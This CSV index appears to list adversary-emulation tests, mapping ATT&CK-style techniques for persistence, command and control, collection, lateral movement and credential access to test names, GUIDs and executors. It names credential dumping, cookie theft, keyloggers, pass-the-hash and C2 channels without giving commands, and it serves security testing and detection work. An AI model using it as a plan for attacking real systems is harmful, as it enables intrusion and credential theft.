persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
persistence,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using keymgr.dll and rundll32.exe,84113186-ed3c-4d0d-8a3c-8980c86c1f4a,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,1,Azure - Search Azure AD User Attributes for Passwords,ae9b2e3e-efa1-4483-86e2-fae529ab9fb6,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
